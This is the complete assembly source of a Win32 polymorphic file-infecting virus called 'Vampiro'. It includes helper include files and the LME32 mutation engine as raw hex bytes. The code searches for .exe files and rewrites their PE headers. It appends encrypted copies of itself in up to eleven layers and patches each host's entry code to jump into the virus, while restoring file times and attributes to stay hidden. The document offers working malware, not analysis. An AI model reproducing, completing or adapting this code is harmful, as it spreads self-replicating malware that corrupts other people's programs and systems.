; Win32.Vampiro.2883 ; ; - poly, used LME32 v.1.0 ; - many layers, max - 11 ; - used SEH ; - dont change entry point ; ; (c) LordDark [MATRiX] .386 include 1.inc locals __ .model flat .code db ? .data start proc call get_delta call set_seh mov esp, [esp.8] jmp exit set_seh: sti sub eax, eax push 4 ptr fs:[eax] mov 4 ptr fs:[eax], esp mov eax, [esp+11*4] sub ax, ax __5: cmp 2 ptr [eax], 'ZM' jz __4 sub eax, 10000h jmp __5 __4: mov 4 ptr [ebp.k32], eax call import push 0 call [ebp.GetModuleHandleA] add [ebp.host32_1], eax call restore sub esp, 16 push esp call [ebp.GetSystemTime] mov eax, esp push eax eax esp eax call [ebp.SystemTimeToFileTime] mov eax, [esp] xor eax, [esp.4] add esp, 24 mov [ebp.seed], eax lea eax, [ebp.rnd] mov 4 ptr [ebp.lme32_random], eax push _vl 0 call [ebp.GlobalAlloc] push eax xchg eax, edi lea esi, [ebp.start] mov ecx, vl lea eax, [ebp+__exit] push eax lea eax, [edi+__next-start] push eax rep movsb ret __next: call get_delta sub esp, size find_str mov esi, esp sub edi, edi push esi ;;; hehe lea eax, [ebp+mask] push eax call [ebp+FindFirstFileA] cmp eax, -1 jz __1 __2: push eax push edi push esi lea edx, [esi.cFileName] call infect_it pop esi push esi push 4 ptr [esp.8] call [ebp+FindNextFileA] pop edi inc edi cmp edi, 50 ja __3 test eax, eax pop eax jnz __2 push eax __3: call [ebp+FindClose] __1: add esp, size find_str ret __exit: call [ebp.GlobalFree] exit: pop 4 ptr fs:[0] pop eax popad popf db 68h host32_1 dd offset host32-400000h ret endp mask db '*.exe',0 restore proc push 0 5 call __1 saved: dd 90909090h db 90h __1: mov eax, [ebp.host32_1] push eax call [ebp.GetCurrentProcess] push eax call [ebp.WriteProcessMemory] ret endp Vampiro db 'Vampiro',0 import_table: import_beg kernel32 import_nam _lopen import_nam ReadFile import_nam WriteFile import_nam CloseHandle import_nam SetFileAttributesA import_nam GetFileAttributesA import_nam GetFileTime import_nam SetFileTime import_nam SetEndOfFile import_nam GetFileSize import_nam SetFilePointer import_nam SystemTimeToFileTime import_nam GetSystemTime import_nam WriteProcessMemory import_nam GetCurrentProcess import_nam GlobalAlloc import_nam GlobalFree import_nam FindClose import_nam FindFirstFileA import_nam FindNextFileA import_end import_end get_delta proc call $+5 delta: cld pop ebp sub ebp, offset delta ret endp include import.inc infect_it proc call __set_seh mov esp, [esp.8] jmp __1 __set_seh: cld sub eax, eax push 4 ptr fs:[eax] mov 4 ptr fs:[eax], esp call infect __1: pop 4 ptr fs:[0] pop eax ret endp infect proc ; edx - name call fattrg cmp eax, -1 jnz __1 __2: ret __1: sub ecx, ecx xchg eax, ecx call fattrs test eax, eax jz __2 push 2 pop eax call open cmp eax, -1 xchg eax, ebx jz __2 push ecx sub esp, 3*8 mov esi, esp push edx call gettime lea edx, [ebp.buffer] push 3Ch+4 pop ecx call read jc __close cmp 2 ptr [edx], 'ZM' jnz __close cmp 2 ptr [edx.18h], 40h jb __close push edx movzx edx, 2 ptr [edx.3Ch] mov [ebp.word3C], edx call seek pop edx mov ecx, 0F8h + (28h*8) call read jc __close cmp 2 ptr [edx], 'EP' jnz __close ; dll ? if i process dll then skip ; this test test 2 ptr [edx.16h], 2000h jnz __close ; can run ? test 2 ptr [edx.16h], 0002h jz __close ; intel x86 processor ? mov al, [edx.4] and al, 11110000b cmp al, 40h jnz __close ; 2..8 sections ? cmp 2 ptr [edx.06h], 8 ja __close cmp 2 ptr [edx.06h], 2 jb __close ; it's already ? mov al, 2Eh cmp 1 ptr [edx.44h], al jz __close mov 1 ptr [edx.44h], al ; save EIP mov eax, [edx.28h] mov [ebp.host32_1], eax mov eax, 1000h cmp [edx.38h], eax ja __close cmp [edx.3Ch], eax ja __close lea edi, [ebp.buff] mov ecx, (len_buff)/4 sub eax, eax call rnd __loop: sub al, cl rol eax, 1 stosd loop __loop ; ecx - null mov 4 ptr [edx.58h], ecx call process_it __close: pop edx mov esi, esp call settime add esp, 3*8 call close pop eax call fattrs ret endp process_it proc movzx eax, 2 ptr [edx.14h] cmp al, 0E0h jnz __1 lea edi, [eax+18h+edx] movzx ecx, 2 ptr [edx.6] __loop: ; check file mov esi, [edx.28h] cmp 4 ptr [edi.0Ch], esi ja __4 push eax mov eax, 4 ptr [edi.0Ch] add eax, 4 ptr [edi.10h] cmp esi, eax pop eax jb __5 __4: add edi, 28h loop __loop jmp __1 __5: test 1 ptr [edi.27h], 80h jnz __1 ; read from IP some bytes ; for UEP lea esi, [eax+18h+edx] push edx mov eax, [edx.028h] sub eax, [edi.0Ch] add eax, [edi.14h] mov 4 ptr [ebp.forUEP], eax xchg eax, edx call seek lea edx, [ebp.UEP] mov ecx, size_UEP call read pop edx jc __1 movzx eax, 2 ptr [edx.6] dec eax imul eax, eax, 28h add esi, eax mov edi, [esi.14h] add edi, [esi.10h] call fsize cmp eax, edi jz __2 push edx mov edx, edi call seek push eax mov edx, esp push 4 pop ecx call read pop eax cmp eax, 1 jz __3 call fsize sub eax, edi cmp eax, 100h ; 256 bytes only ; if yes then skip it ;) jb __3 pop eax jmp __1 __3: mov edx, edi call seek call truncate pop edx __2: mov [ebp.flen], edi or 1 ptr [esi.24h+3], 0C0h lea edi, [ebp.UEP] mov eax, [edi] mov 4 ptr [ebp.saved], eax mov al, [edi.4] mov 1 ptr [ebp.saved+4], al mov al, 0E9h stosb mov eax, 4 ptr [esi.10h] add eax, 4 ptr [esi.0Ch] sub eax, 4 ptr [ebp.host32_1] sub eax, 5 stosd ; max 11 layers! push esi ; gen 1 layer lea esi, [ebp.start] lea edi, [ebp.buff] mov ecx, vl call lme32 ; max 10 layer ; 2..10 push eax push 5 pop eax call rnd inc eax shl eax, 1 xchg eax, ecx ; gen next layers pop eax __8: push ecx ; 1 layer <-| ; 2 layer ---| mov esi, edi add edi, eax xchg eax, ecx call lme32 xchg esi, edi xchg eax, ecx call lme32 ; edi - 1 layer ; esi - 2 layer ; eax - length pop ecx loop __8 pop esi dec edi dec edi mov 2 ptr [edi], 609Ch add eax, 8 xchg eax, edi push eax ; edi - virus length mov eax, edi add eax, [edx.3Ch] add eax, [esi.10h] mov ecx, [edx.3Ch] neg ecx and eax, ecx mov [esi.10h], eax cmp [esi.08h], eax ja __x mov [esi.08h], eax __x: mov eax, [esi.08h] add eax, [esi.0Ch] add eax, [edx.38h] mov ecx, [edx.38h] neg ecx and eax, ecx mov [edx.50h], eax call fsize xchg eax, edx call seek pop edx push -1 pop eax call rnd db 0BFh flen dd 0 mov ecx, [esi.10h] add ecx, [esi.14h] sub ecx, edi mov 1 ptr [ecx+edx-6], al xor al, 'V' mov 1 ptr [ecx+edx-6+1], al mov 4 ptr [ecx+edx-6+2], edi call write mov edx, [ebp.forUEP] call seek lea edx, [ebp.UEP] mov ecx, size_UEP call write mov edx, [ebp.word3C] call seek lea edx, [ebp.buffer] mov ecx, 0F8h + (28h*8) call write __1: ret endp rnd proc push ebp push edx ecx eax call $+5 $delta: pop ebp sub ebp, offset $delta db 0B8h seed dd ? imul eax, eax, 8088405h inc eax mov [ebp.seed], eax pop ecx jecxz __1 xor edx, edx div ecx xchg eax, edx __1: pop ecx edx pop ebp ret endp include fio.inc include lme32.inc vl equ ($-start) buff: db (11*2000)+vl*2 dup (?) db 1000h dup (?) len_buff equ $-buff buffer db 0F8h + (28h*8) dup (?) word3C dd ? size_UEP equ 5 UEP db size_UEP dup (?) forUEP dd ? _vl equ ($-start) .code host32: db 0E9h dd 0 push 0 zcall ExitProcess db 'Win32.Vampiro.' db vl / 1000 mod 10 + '0' db vl / 100 mod 10 + '0' db vl / 10 mod 10 + '0' db vl / 1 mod 10 + '0' real_start: pushf pusha jmp start end real_start --[1.inc]--------------------------------------------------------------------->8 zcall macro api extrn api: proc call api endm CRC32_init equ 0EDB88320h CRC32_num equ 0FFFFFFFFh CRC32_eax macro string db 0B8h CRC32 string endm CRC32 macro string crcReg = CRC32_num irpc _x, ctrlByte = '&_x&' xor (crcReg and 0FFh) crcReg = crcReg shr 8 rept 8 ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1)) endm crcReg = crcReg xor ctrlByte endm dd crcReg endm import_beg macro kernel db '&kernel&',0 endm import_nam macro name CRC32 &name& local b b=0 irpc a, IF b EQ 0 db '&a&' ENDIF b=b+1 endm &name& dd 0 endm import_end macro dd 0 endm MAX_PATH = 260 find_str struc dwFileAttributes dd ? ftCreationTime dq ? ftLastAccessTime dq ? ftLastWriteTime dq ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName db MAX_PATH dup (?) cAlternateFileName db 14 dup (?) ends unicode macro text irpc _x, db '&_x&',0 endm db 0,0 endm hook macro name local b b=0 irpc a, IF b EQ 0 db '&a&' ENDIF b=b+1 endm CRC32 &name& dw offset h&name&-start dw offset _&name&-start endm dtime struc wYear dw ? wMonth dw ? wDayOfWeek dw ? wDay dw ? wHour dw ? wMinute dw ? wSecond dw ? wMilliseconds dw ? ends --[import.inc]---------------------------------------------------------------->8 get_proc proc push ebp ; in: ; eax - CRC32 ; ebx - DLL offset ; dl - first char ; out: ; eax - API address ; [ecx+ebx] - offset API address in table ; ebx - offset DLL mov edi, [ebx+3Ch] mov edi, [edi+78h+ebx] mov ecx, [edi+18h+ebx] mov esi, [edi+20h+ebx] __1: mov ebp, [esi+ebx] add ebp, ebx cmp 1 ptr [ebp], dl jnz __2 push ebx ecx ; use ebx, ecx ; ebp - offset to name'z xor ebx, ebx dec ebx __5: xor bl, 1 ptr [ebp] inc ebp mov cl, 7 __3: shr ebx, 1 jnc __4 xor ebx, CRC32_init __4: dec cl jns __3 cmp 1 ptr [ebp], 0 jnz __5 cmp eax, ebx pop ecx ebx jz __6 __2: add esi, 4 loop __1 __6: sub ecx, [edi+18h+ebx] neg ecx add ecx, ecx add ecx, [edi+24h+ebx] add ecx, ebx movzx ecx, 2 ptr [ecx] shl ecx, 2 add ecx, [edi+1Ch+ebx] mov eax, [ecx+ebx] add eax, ebx pop ebp ret endp import proc mov ebx, [ebp.k32] CRC32_eax GetModuleHandleA mov dl, 'G' call get_proc mov [ebp.GetModuleHandleA], eax CRC32_eax LoadLibraryA mov dl, 'L' call get_proc mov [ebp.LoadLibraryA], eax lea esi, [ebp.import_table] __1: push esi call [ebp.GetModuleHandleA] test eax, eax jnz __2 ; if library not load ... push esi call [ebp.LoadLibraryA] __2: xchg eax, ebx __3: lodsb test al, al jnz __3 __4: lodsd test eax, eax jz __5 mov dl, [esi] inc esi push esi call get_proc pop edi stosd mov esi, edi jmp __4 __5: cmp [esi], eax jnz __1 ret endp GetModuleHandleA dd 0 LoadLibraryA dd 0 k32 dd 0BFF70000h --[fio.inc]------------------------------------------------------------------->8 truncate proc pushad push ebx call [ebp.SetEndOfFile] jmp n_chk endp fsize proc pushad push 0 ebx call [ebp.GetFileSize] jmp n_chk endp gettime proc pushad ; esi - addres struc ; ; CONST FILETIME * lpftLastWrite // time the file was last written ; CONST FILETIME * lpftLastAccess, // time the file was last accessed ; CONST FILETIME * lpftCreation, // time the file was created ; ; filetime struc ; dwLowDateTime dd ? ; dwHighDateTime dd ? ; ends push esi lodsd lodsd push esi lodsd lodsd push esi ebx call [ebp.GetFileTime] jmp n_chk endp settime proc pushad ; esi - addres struc ; ; CONST FILETIME * lpftLastWrite // time the file was last written ; CONST FILETIME * lpftLastAccess, // time the file was last accessed ; CONST FILETIME * lpftCreation, // time the file was created ; ; filetime struc ; dwLowDateTime dd ? ; dwHighDateTime dd ? ; ends push esi lodsd lodsd push esi lodsd lodsd push esi ebx call [ebp.SetFileTime] jmp n_chk endp fattrs proc pushad push eax edx call [ebp.SetFileAttributesA] jmp n_chk endp fattrg proc pushad push edx call [ebp.GetFileAttributesA] jmp n_chk endp open proc pushad ; eax - mode ; edx - name ; ; OF_READ Opens the file for reading only. ; OF_READWRITE Opens the file for reading and writing. ; OF_WRITE Opens the file for writing only. push eax edx call [ebp._lopen] n_chk: mov [esp.1Ch], eax popad ret endp close proc pushad push ebx call [ebp.CloseHandle] popad ret endp write proc pushad push eax mov eax, esp push 0 push eax push ecx edx ebx call [ebp.WriteFile] jmp n_check endp read proc ; ecx - length ; ebx - handle ; edx - buffer pushad push eax mov eax, esp push 0 push eax push ecx edx ebx call [ebp.ReadFile] n_check: pop eax mov [esp.1Ch], eax popad cmp eax, ecx jz __1 stc __1: ret endp seek proc pushad push 0 0 edx ebx call [ebp.SetFilePointer] jmp n_chk endp --[lme32.inc]----------------------------------------------------------------->8 ; LME32 v.1.0 ; ; ECX - length ; EDI - buffer ; ESI - source ; ; must be in r/w section lme32: db 060h,0E8h,00Fh,000h,000h,000h lme32_random dd 0 db 05Bh,04Ch,04Dh,045h db 033h,032h,02Eh,031h,031h,037h,033h,05Dh,081h,0EDh,006h,020h,040h,000h db 0C1h,0E9h,002h,041h,089h,08Dh,0D3h,021h,040h,000h,089h,0BDh,0E5h,021h db 040h,000h,089h,0B5h,0CEh,021h,040h,000h,0C7h,085h,025h,022h,040h,000h db 0EFh,000h,000h,000h,08Dh,0B5h,030h,022h,040h,000h,0E8h,00Fh,003h,000h db 000h,0B0h,003h,0FFh,0D6h,040h,091h,051h,0E8h,070h,002h,000h,000h,059h db 0E2h,0F7h,0B0h,0E8h,0AAh,02Bh,0C0h,0ABh,08Bh,0C7h,02Bh,085h,0E5h,021h db 040h,000h,089h,085h,0BCh,021h,040h,000h,0E8h,0E7h,002h,000h,000h,0E8h db 0ABh,001h,000h,000h,088h,085h,046h,021h,040h,000h,050h,00Fh,0B6h,0C0h db 00Fh,0B3h,085h,025h,022h,040h,000h,058h,00Ch,058h,0AAh,0E8h,091h,001h db 000h,000h,050h,00Fh,0B6h,0C0h,00Fh,0B3h,085h,025h,022h,040h,000h,058h db 088h,085h,077h,021h,040h,000h,08Bh,095h,0D3h,021h,040h,000h,0E8h,053h db 001h,000h,000h,0E8h,0A6h,002h,000h,000h,0E8h,0B1h,002h,000h,000h,06Ah db 0FFh,058h,0FFh,095h,006h,020h,040h,000h,089h,085h,0E1h,020h,040h,000h db 0B0h,081h,0AAh,0E8h,04Ah,001h,000h,000h,0B0h,0E8h,074h,002h,0B0h,0C0h db 09Ch,00Ah,085h,046h,021h,040h,000h,0AAh,089h,0BDh,082h,021h,040h,000h db 0B8h,064h,022h,002h,002h,0ABh,09Dh,074h,006h,0F7h,09Dh,0E1h,020h,040h db 000h,0E8h,062h,002h,000h,000h,0B0h,003h,0FFh,0D6h,003h,0C0h,08Bh,09Ch db 005h,0F5h,021h,040h,000h,066h,089h,09Dh,0DDh,021h,040h,000h,08Bh,084h db 005h,0EFh,021h,040h,000h,00Ah,0A5h,046h,021h,040h,000h,066h,0ABh,089h db 0BDh,0C7h,021h,040h,000h,0ABh,06Ah,0FFh,058h,0FFh,095h,006h,020h,040h db 000h,089h,085h,0D8h,021h,040h,000h,0ABh,0E8h,023h,002h,000h,000h,0B0h db 083h,0AAh,0E8h,0DBh,000h,000h,000h,066h,0B8h,0C0h,004h,074h,004h,066h db 0B8h,0E8h,0FCh,00Ch,003h,066h,0ABh,0E8h,008h,002h,000h,000h,0B0h,048h db 00Ah,085h,077h,021h,040h,000h,0AAh,0E8h,0FAh,001h,000h,000h,0E8h,005h db 002h,000h,000h,0B0h,003h,0FFh,0D6h,08Dh,09Dh,0FBh,021h,040h,000h,0D7h db 0AAh,08Ah,085h,077h,021h,040h,000h,0C0h,0E0h,003h,00Ch,000h,00Ch,0C0h db 0AAh,066h,0B8h,00Fh,085h,066h,0ABh,0B8h,0E0h,098h,040h,000h,02Bh,0C7h db 0ABh,050h,00Fh,0B6h,085h,046h,021h,040h,000h,00Fh,0ABh,085h,025h,022h db 040h,000h,058h,050h,00Fh,0B6h,085h,077h,021h,040h,000h,00Fh,0ABh,085h db 025h,022h,040h,000h,058h,0E8h,0A8h,001h,000h,000h,0E8h,0B3h,001h,000h db 000h,08Bh,0C7h,02Bh,085h,0E5h,021h,040h,000h,02Dh,030h,002h,000h,000h db 003h,085h,0E1h,020h,040h,000h,0BAh,0F8h,098h,040h,000h,089h,002h,0BEh db 02Bh,082h,040h,000h,0B9h,015h,005h,000h,000h,0BAh,084h,056h,0BAh,05Ah db 0ADh,003h,0C2h,0ABh,0E2h,0FAh,08Bh,0C7h,02Dh,07Dh,096h,040h,000h,089h db 044h,024h,01Ch,061h,0C3h,081h,0B0h,081h,080h,081h,0A8h,033h,0C2h,02Bh db 0C2h,003h,0C2h,085h,023h,00Bh,0E8h,013h,000h,000h,000h,074h,006h,00Ch db 0B8h,0AAh,092h,0ABh,0C3h,050h,0B0h,068h,0AAh,092h,0ABh,058h,00Ch,058h db 0AAh,0C3h,050h,0B0h,002h,0FFh,0D6h,085h,0C0h,058h,0C3h,053h,0B0h,008h db 0FFh,0D6h,0BBh,0EFh,000h,000h,000h,00Fh,0A3h,0C3h,073h,0F2h,05Bh,0C3h db 00Fh,0B6h,0C0h,0FFh,0A5h,006h,020h,040h,000h,080h,0CCh,0C0h,0C0h,0E0h db 003h,00Ah,0C4h,0AAh,0C3h,008h,047h,0FFh,0C3h,00Ch,0C0h,0AAh,0B0h,008h db 0FFh,0D6h,03Ch,006h,074h,0F8h,0C0h,0E0h,003h,008h,047h,0FFh,0C3h,00Ch db 0C0h,0C0h,0E4h,003h,00Ah,0C4h,0AAh,0B0h,0FFh,0FFh,0D6h,0AAh,0C3h,08Bh db 039h,002h,07Fh,0B7h,039h,002h,040h,0BFh,039h,002h,040h,087h,039h,002h db 0BFh,003h,039h,002h,07Fh,013h,039h,002h,07Fh,023h,039h,002h,07Fh,00Bh db 039h,002h,07Fh,02Bh,039h,002h,07Fh,01Bh,039h,002h,07Fh,033h,039h,002h db 07Fh,040h,043h,002h,07Fh,048h,043h,002h,07Fh,039h,039h,002h,03Fh,085h db 039h,002h,03Fh,0D1h,047h,002h,07Fh,0D3h,047h,002h,07Fh,0A4h,059h,002h db 040h,0ACh,059h,002h,040h,0C8h,043h,002h,040h,0ABh,039h,002h,080h,0B3h db 039h,002h,080h,0BBh,039h,002h,080h,0E8h,09Eh,000h,000h,000h,0B8h,064h db 067h,0FFh,036h,0ABh,02Bh,0C0h,066h,0ABh,0E8h,07Fh,000h,000h,000h,0E8h db 08Ah,000h,000h,000h,0B0h,0E8h,0AAh,0ABh,057h,0E8h,070h,000h,000h,000h db 0E8h,07Bh,000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h db 0ABh,0E8h,05Ch,000h,000h,000h,0E8h,067h,000h,000h,000h,0B0h,0E9h,0AAh db 0ABh,08Bh,0D7h,0E8h,04Ch,000h,000h,000h,0E8h,057h,000h,000h,000h,058h db 08Bh,0DFh,02Bh,0D8h,089h,058h,0FCh,0E8h,03Ah,000h,000h,000h,0E8h,045h db 000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h,0ABh,0E8h db 026h,000h,000h,000h,0E8h,031h,000h,000h,000h,0B8h,064h,067h,0FFh,026h db 0ABh,02Bh,0C0h,066h,0ABh,0E8h,012h,000h,000h,000h,0B0h,0FFh,0FFh,0D6h db 0AAh,0E8h,008h,000h,000h,000h,08Bh,0C7h,02Bh,0C2h,089h,042h,0FCh,0C3h db 0B0h,005h,0FFh,0D6h,040h,091h,051h,0E8h,013h,000h,000h,000h,059h,0E2h db 0F7h,0C3h,080h,0BDh,07Eh,023h,040h,000h,001h,075h,005h,0E8h,009h,000h db 000h,000h,0C3h,0B0h,004h,0FFh,0D6h,022h,0C0h,075h,049h,0B0h,000h,084h db 0C0h,075h,012h,0FEh,085h,07Eh,023h,040h,000h,0B0h,0E8h,0AAh,089h,0BDh db 09Eh,023h,040h,000h,0ABh,0EBh,031h,0E8h,085h,0FEh,0FFh,0FFh,00Ch,0B8h db 0AAh,0B8h,034h,099h,040h,000h,08Bh,0DFh,02Bh,0D8h,057h,097h,093h,083h db 0E8h,004h,0ABh,05Fh,0B0h,0C3h,0AAh,06Ah,0FFh,058h,0FFh,095h,006h,020h db 040h,000h,066h,0ABh,0C1h,0E8h,010h,0AAh,0FEh,08Dh,07Eh,023h,040h,000h db 0B0h,01Ah,0FFh,0D6h,03Ch,019h,075h,016h,0E8h,009h,000h,000h,000h,0F8h db 0FCh,0FAh,0F5h,0FBh,090h,0F9h,0FDh,09Eh,05Bh,0B0h,009h,0FFh,0D6h,0D7h db 0AAh,0C3h,03Ch,018h,075h,017h,052h,06Ah,0FFh,058h,0FFh,095h,006h,020h db 040h,000h,092h,0E8h,027h,0FEh,0FFh,0FFh,0E8h,001h,0FEh,0FFh,0FFh,05Ah db 0C3h,03Ch,017h,075h,01Dh,0B0h,08Dh,0AAh,0E8h,014h,0FEh,0FFh,0FFh,03Ch db 005h,074h,0F7h,0C0h,0E0h,003h,00Ch,005h,0AAh,06Ah,0FFh,058h,0FFh,095h db 006h,020h,040h,000h,0ABh,0C3h,08Dh,09Ch,085h,067h,022h,040h,000h,0E8h db 0EAh,0FDh,0FFh,0FFh,074h,003h,0B0h,066h,0AAh,0F6h,043h,003h,03Fh,075h db 003h,0B0h,00Fh,0AAh,08Ah,003h,0AAh,08Ah,043h,003h,024h,0C0h,03Ch,000h db 075h,016h,0B0h,008h,0FFh,095h,006h,020h,040h,000h,08Ah,0C8h,0B0h,008h db 0FFh,095h,006h,020h,040h,000h,08Ah,0E1h,0EBh,02Bh,03Ch,040h,075h,015h db 0E8h,0BAh,0FDh,0FFh,0FFh,08Ah,0C8h,0B0h,008h,0FFh,095h,006h,020h,040h db 000h,08Ah,0E0h,08Ah,0C1h,0EBh,012h,0E8h,0A5h,0FDh,0FFh,0FFh,08Ah,0C8h db 0E8h,09Eh,0FDh,0FFh,0FFh,03Ah,0C1h,074h,0F0h,08Ah,0E1h,00Fh,0B7h,05Bh db 001h,08Dh,09Ch,01Dh,000h,020h,040h,000h,0FFh,0D3h,0C3h